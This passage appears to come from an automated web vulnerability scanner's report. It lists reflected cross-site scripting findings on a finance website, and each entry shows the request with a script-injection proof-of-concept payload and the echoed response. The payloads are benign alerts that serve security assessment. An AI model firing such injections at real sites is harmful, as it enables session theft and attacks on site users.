The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:58 GMT
Content-Length: 13645
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'">
...[SNIP]...

4.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241183.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13681
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'">
...[SNIP]...

4.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241193.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 14125
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'">
...[SNIP]...

4.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299523.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:39 GMT
Content-Length: 13301
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'">
...[SNIP]...

4.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299533.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13628
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'">
...[SNIP]...

4.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299543.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:03 GMT
Content-Length: 13601
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'">
...[SNIP]...

4.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299553.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 13663
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'">
...[SNIP]...

4.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:20 GMT
Content-Length: 21653
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1" />
...[SNIP]...

4.496. http://www.myfinances.com/budget.php [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:41 GMT
Content-Length: 19651
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type='text' id='keyword' name='keyword' title='savings accountse9843'><script>alert(1)</script>2707c201b22' value ='savings accountse9843'>
...[SNIP]...

4.497. http://www.myfinances.com/budget.php [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:45 GMT
Content-Length: 19629
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<h2>Results for &lsquo;savings accountsa2ce6<script>alert(1)</script>826352099bb&rsquo;</h2>
...[SNIP]...

4.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

